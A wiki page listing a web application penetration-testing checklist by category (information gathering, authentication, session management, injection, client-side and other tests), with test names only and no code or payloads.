WIKI

Notes

View on GitHub

Web Application Pentesting checklist :

Information Gathering

  1. Open Source Reconnaissance
  2. Fingerprinting Web Server
  3. Looking for Metafiles
  4. Enumerating Web Server’s Applications
  5. Review the Web Contents
  6. Identifying Application’s Entry Points
  7. Mapping Execution Paths
  8. Fingerprint Web Application Framework
  9. Map Application Architecture

Configuration & Deployment management

  1. Test Network Configuration
  2. Test Application Configuration
  3. Test File Extension Handling
  4. Review Backup & Unreferenced Files
  5. Enumerate Infrastructure & Admin Interfaces
  6. Testing HTTP MEthods
  7. Test HSTS (Strict Transport Security)
  8. Test RIA Cross Domain Policy
  9. Test File Permission
  10. Test For Subdomain Takeover
  11. Test Cloud Storage

Identity management

  1. Test Role Definitions
  2. Test User Registration Process
  3. Test Account Provisioning Process
  4. Testing For Account Enumeration
  5. Test For Weak Username Policy

Authentication Testing

  1. Test For Un-Encrypted (HTTP) Channel
  2. Test For Default Credentials
  3. Test For Weak Lockout Mechanism
  4. Test For Bypassing Authentication Schema
  5. Test For Vulnerable Remember Password
  6. Test For Browser Cache Weakness
  7. Test For Weak Password Policy
  8. Test For Weak Security Questions
  9. Test For Weak Password Reset Function
  10. Test For Weak Password Change Function
  11. Test For Weak Authentication In Alternative Channel

Authorization Testing

  1. Testing Directory Traversal File include
  2. Testing Traversal With Encoding
  3. Testing Traversal With Dfferent OS Schemes
  4. Test Other Encoding Techniques
  5. Test Authorization Schema Bypass
  6. Test For Privilege Escalation
  7. Test For Insecure Direct Object Reference

Session Management Testing

  1. Test For Session Management Schema
  2. Test For Cookie Attributes
  3. Test For Session Fixation
  4. Test For Exposed Session Variables
  5. Test For Back Refresh Attack
  6. Test For Cross Site Request Forgery (CSRF)
  7. Test For Logout Functionality
  8. Test For Session Timeout
  9. Test For Session Puzzling
  10. Test For Session Hijacking

Input Validation Testing

  1. Test For Reflected Cross Site Scripting (Reflected XSS)
  2. Test For Stored Cross Site Scripting (Stored XSS)
  3. Test For HTTP Parameter Pollution
  4. Test For SQL injection
  5. Test For LDAP Injection
  6. Testing For XML injection
  7. Test For Server Side Includes
  8. Test For XPATH Injection
  9. Test For IMAP SMTP Injection
  10. Test For Local File Inclusion
  11. Test For Remote File Inclusion
  12. Test For Command Injection
  13. Test For Format String Injection
  14. Test For Host Header Injection
  15. Test For Server Side Request Forgery (SSRF)
  16. Test For Server Side Template Injection

Error Handling Testing

  1. Test For Improper Error Handling

Weak Cryptography Testing

  1. Test For Weak Transport Layer Security

Business Logic Testing

  1. Test For Business Logic
  2. Test For Malicious File Upload

Client Side Testing

  1. Test For DOM Based XSS
  2. Test For URL Redirect
  3. Test For Cross Origin Resource Sharing
  4. Test For CLickJacking

Other Common Issues

  1. Test For No-Rate Limiting
  2. Test For Exif Geodata
  3. Test For Broken Link Hijack
  4. Test For SPF
  5. Test For Weak 2FA
  6. Test For Weak OTP Implementation

(Ref : https://github.com/Hari-prasaanth/Web-App-Pentest-Checklist)